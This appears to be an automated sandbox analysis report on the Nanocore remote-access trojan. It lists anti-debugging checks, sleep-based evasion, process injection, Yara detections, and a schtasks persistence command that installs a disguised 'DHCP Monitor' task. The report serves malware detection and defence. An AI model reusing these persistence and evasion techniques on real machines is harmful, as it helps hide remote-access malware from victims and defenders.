      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeWindow / User API: threadDelayed 4165Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeWindow / User API: threadDelayed 5343Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeWindow / User API: foregroundWindowGot 941Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exe TID: 6304Thread sleep time: -13835058055282155s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exe TID: 3136Thread sleep count: 39 > 30Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exe TID: 6792Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 864Thread sleep count: 42 > 30Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4780Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7156Thread sleep count: 41 > 30Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7036Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_00405301
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,1_2_00405C94
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_004026BC FindFirstFileA,1_2_004026BC
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_00405301
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,8_2_00405C94
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_004026BC FindFirstFileA,8_2_004026BC
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_00404A29 FindFirstFileExW,10_2_00404A29
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_00404A29 FindFirstFileExW,10_1_00404A29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_00404A29 FindFirstFileExW,11_2_00404A29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_00404A29 FindFirstFileExW,11_1_00404A29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_00404A29 FindFirstFileExW,13_2_00404A29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_00404A29 FindFirstFileExW,13_1_00404A29
      Source: C:\Users\user\Desktop\nanocore.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\nanocore.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_6FC71000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,1_2_6FC71000
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,1_2_00401FDC
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_02CB168F mov eax, dword ptr fs:[00000030h]1_2_02CB168F
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_02CB18A7 mov eax, dword ptr fs:[00000030h]1_2_02CB18A7
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]2_2_004035F1
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_02CB168F mov eax, dword ptr fs:[00000030h]8_2_02CB168F
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_02CB18A7 mov eax, dword ptr fs:[00000030h]8_2_02CB18A7
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 9_2_0254168F mov eax, dword ptr fs:[00000030h]9_2_0254168F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 9_2_025418A7 mov eax, dword ptr fs:[00000030h]9_2_025418A7
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_004035F1 mov eax, dword ptr fs:[00000030h]10_2_004035F1
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_004035F1 mov eax, dword ptr fs:[00000030h]10_1_004035F1
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_004035F1 mov eax, dword ptr fs:[00000030h]11_2_004035F1
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_004035F1 mov eax, dword ptr fs:[00000030h]11_1_004035F1
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02B718A7 mov eax, dword ptr fs:[00000030h]12_2_02B718A7
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02B7168F mov eax, dword ptr fs:[00000030h]12_2_02B7168F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_004035F1 mov eax, dword ptr fs:[00000030h]13_2_004035F1
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_004035F1 mov eax, dword ptr fs:[00000030h]13_1_004035F1
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_004067FE GetProcessHeap,2_2_004067FE
      Source: C:\Users\user\Desktop\nanocore.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_00401E1D SetUnhandledExceptionFilter,2_2_00401E1D
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C88
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F30
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_00401E1D SetUnhandledExceptionFilter,10_2_00401E1D
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0040446F
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00401C88
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00401F30
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_00401E1D SetUnhandledExceptionFilter,10_1_00401E1D
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_0040446F
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_00401C88
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_00401F30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_00401E1D SetUnhandledExceptionFilter,11_2_00401E1D
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0040446F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00401C88
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00401F30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_00401E1D SetUnhandledExceptionFilter,11_1_00401E1D
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_1_0040446F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_1_00401C88
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_00401F30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_00401E1D SetUnhandledExceptionFilter,13_2_00401E1D
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0040446F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00401C88
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00401F30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_00401E1D SetUnhandledExceptionFilter,13_1_00401E1D
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_1_0040446F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_1_00401C88
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_1_00401F30
      Source: C:\Users\user\Desktop\nanocore.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Contains functionality to prevent local Windows debuggingShow sources
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_6FC71000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,1_2_6FC71000
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_6EEC1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,8_2_6EEC1000
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 9_2_6EDA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,9_2_6EDA1000
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_6F651000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,12_2_6F651000
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\nanocore.exeSection loaded: unknown target: C:\Users\user\Desktop\nanocore.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeSection loaded: unknown target: C:\Users\user\Desktop\nanocore.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: unknown target: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: unknown target: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Users\user\Desktop\nanocore.exe 'C:\Users\user\Desktop\nanocore.exe' Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Users\user\Desktop\nanocore.exe C:\Users\user\Desktop\nanocore.exe 0Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' Jump to behavior
      Source: nanocore.exe, 00000002.00000002.906510253.0000000002AE3000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: nanocore.exe, 00000002.00000002.905490910.0000000000E60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: nanocore.exe, 00000002.00000002.905490910.0000000000E60000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: nanocore.exe, 00000002.00000002.909739780.0000000005A2D000.00000004.00000001.sdmpBinary or memory string: Program Managerp
      Source: nanocore.exe, 00000002.00000002.905490910.0000000000E60000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: nanocore.exe, 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmpBinary or memory string: Program Manager\9'
      Source: nanocore.exe, 00000002.00000002.909609083.000000000579C000.00000004.00000001.sdmpBinary or memory string: Program ManagerpJ
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_0040208D cpuid 2_2_0040208D
      Source: C:\Users\user\Desktop\nanocore.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00401B74
      Source: C:\Users\user\Desktop\nanocore.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORY
      Source: Yara matchFile source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
